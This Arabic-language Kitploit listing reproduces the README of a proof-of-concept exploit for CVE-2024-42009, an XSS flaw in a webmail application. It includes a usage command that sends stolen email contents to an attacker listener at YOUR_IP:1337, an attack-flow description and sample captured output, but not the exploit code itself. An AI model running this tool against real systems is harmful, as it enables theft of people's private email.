Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-42009 — يُظهر إثبات المفهوم (PoC) هذا استغلالًا لـ CVE-2024-42009، مستفيدًا من ثغرة البرمجة النصية عبر المواقع (XSS) لاستخراج رسائل البريد الإلكتروني من تطبيق ويب ميل مستهدف. يُحقن الهجوم حمولة ضارة تقوم بتسريب محتوى البريد الإلكتروني إلى مستمع يتحكم به المهاجم. | Kitploit
أدوات/GitHubGitHub/bhanunamikaze/cve-2024-42009
أدوات التصيدالاستطلاعتوليد الحمولةالاستغلالاستغلال تطبيقات الويبتسريب البياناتجمع المعلوماتالتعلم والتعليم
GitHubbhanunamikaze/cve-2024-42009

CVE-2024-42009

يُظهر إثبات المفهوم (PoC) هذا استغلالًا لـ CVE-2024-42009، مستفيدًا من ثغرة البرمجة النصية عبر المواقع (XSS) لاستخراج رسائل البريد الإلكتروني من تطبيق ويب ميل مستهدف. يُحقن الهجوم حمولة ضارة تقوم بتسريب محتوى البريد الإلكتروني إلى مستمع يتحكم به المهاجم.

1منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع

CVE-2024-42009 PoC: مستمع لالتقاط البريد الإلكتروني واستغلال XSS

نظرة عامة

يُظهر هذا الإثبات المفاهيمي (PoC) استغلالًا لثغرة CVE-2024-42009، مستفيدًا من ثغرة البرمجة النصية عبر المواقع (XSS) لاستخراج رسائل البريد الإلكتروني من تطبيق ويب ميل مستهدف. يقوم الهجوم بحقن حمولة ضارة تقوم بتسريب محتوى البريد الإلكتروني إلى مستمع يتحكم به المهاجم.

الميزات

  • استغلال ثغرة XSS لالتقاط محتويات البريد الإلكتروني.
  • استخدام مستمع HTTP لاستقبال وفك تشفير رسائل البريد الإلكتروني المسربة.
  • أتمتة حقن الحمولة والتسريب.

المتطلبات

  • Python 3.x
  • التبعيات المطلوبة (قم بالتثبيت عبر pip):
    root@kitploit:~
    pip install requests beautifulsoup4
    

الاستخدام

قم بتشغيل السكربت مع الوسائط اللازمة:

root@kitploit:~
python exploit.py -fu [email protected] -tu [email protected] -u http://target.com/contact -ip YOUR_IP -p 1337

المعاملات

سير الهجوم

  1. بدء المستمع: يبدأ السكربت خادم HTTP لالتقاط رسائل البريد الإلكتروني المستخرجة.
  2. حقن الحمولة الضارة: يتم إرسال حمولة XSS عبر بريد إلكتروني معدّل.
  3. تشغيل التنفيذ: عندما يفتح الضحية البريد الإلكتروني، يتم تنفيذ الحمولة وإرسال محتوى البريد إلى خادم المهاجم.
  4. التقاط وفك التشفير: يتم فك تشفير محتوى البريد المستخرج وعرضه.

مثال الإخراج

root@kitploit:~
[*] CVE-2024-42009 PoC: الاستماع على 192.168.1.100:1337...
[*] إرسال الحمولة لـ UID 1...
[+] تم إرسال الحمولة لـ UID 1 (الحالة: 200)

[+] محتوى البريد المستلم:
Hello, this is a test email!

إخلاء مسؤولية

أنا لا أدّعي الملكية أو الإفصاح عن الثغرة وجميع الاستغلالات المقابلة المستضافة في هذا المستودع على GitHub - كل الفضل يعود إلى الباحث الذي اكتشفها؛ لقد قمت فقط بإنشاء PoC لتكرار الثغرة بناءً على البيانات من الإنترنت. هذا PoC مخصص للأغراض التعليمية والبحثية فقط. الاختبار غير المصرح به ضد الأنظمة دون موافقة غير قانوني. استخدمه بمسؤولية!

تنزيل الأداة
الوسيطالوصف
-fu, --from-userعنوان البريد الإلكتروني للمرسل
-tu, --to-userعنوان البريد الإلكتروني للمستلم
-u, --target-urlرابط تطبيق البريد المستهدف
-ip, --server-ipعنوان IP لمستمع المهاجم
-p, --server-portالمنفذ للمستمع (الافتراضي: 1337)